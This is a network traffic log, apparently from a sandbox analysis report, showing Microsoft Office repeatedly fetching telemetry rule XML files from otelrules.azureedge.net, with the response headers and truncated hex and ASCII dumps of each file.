                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          118192.168.2.44988313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:50 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1427
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                          ETag: "0x8DC582BE56F6873"
                                                                                                                          x-ms-request-id: a9c9f622-801e-0047-0d7e-1b7265000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfp6mfve0htepzbps00000004eg00000000evbv
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:50 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          119192.168.2.44988513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:50 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1390
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                          ETag: "0x8DC582BE3002601"
                                                                                                                          x-ms-request-id: b5288d5f-901e-008f-111b-1c67a6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfspvtq2pgqb2w5k0000000051g000000006654
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:50 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          120192.168.2.44988413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:50 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1401
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                          ETag: "0x8DC582BE2A9D541"
                                                                                                                          x-ms-request-id: d113afee-501e-008f-14e4-1a9054000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfp6mfve0htepzbps00000004n0000000002y3g
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:50 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          121192.168.2.44988613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:50 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1364
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                          ETag: "0x8DC582BEB6AD293"
                                                                                                                          x-ms-request-id: b9db8c53-a01e-0002-5a69-1c5074000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfjxfnba42c5rukwg00000002600000000027ha
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:50 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          122192.168.2.44988713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1391
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                          ETag: "0x8DC582BDF58DC7E"
                                                                                                                          x-ms-request-id: 5f90b282-c01e-00ad-7c2b-1ca2b9000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfvq8pt2ak3arkg6n000000031g00000000dswp
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:51 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          123192.168.2.44988813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1354
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                          ETag: "0x8DC582BE0662D7C"
                                                                                                                          x-ms-request-id: 7536bc90-101e-005a-6b87-1c882b000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfmhggkx889x958tc000000028000000000ckxg
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:51 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          124192.168.2.44988913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1403
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                          ETag: "0x8DC582BDCDD6400"
                                                                                                                          x-ms-request-id: 4f40437f-401e-005b-17e8-1c9c0c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cfmhggkx889x958tc00000002cg0000000030fb
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:51 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          125192.168.2.44989013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1366
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                          ETag: "0x8DC582BDF1E2608"
                                                                                                                          x-ms-request-id: 5c04d847-901e-007b-6354-1cac50000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cffhvbz3mt0ydz7x4000000039000000000cdf4
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:51 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          126192.168.2.44989113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1399
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                          ETag: "0x8DC582BE8C605FF"
                                                                                                                          x-ms-request-id: 540e34d0-301e-0096-5f1b-1ce71d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cfpm9w8b1ybgtytds000000031000000000afq9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:51 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          127192.168.2.44989213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1362
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                          ETag: "0x8DC582BDF497570"
                                                                                                                          x-ms-request-id: 1c06004d-d01e-005a-0ee5-1a7fd9000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cfspvtq2pgqb2w5k000000004xg00000000g2t8
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
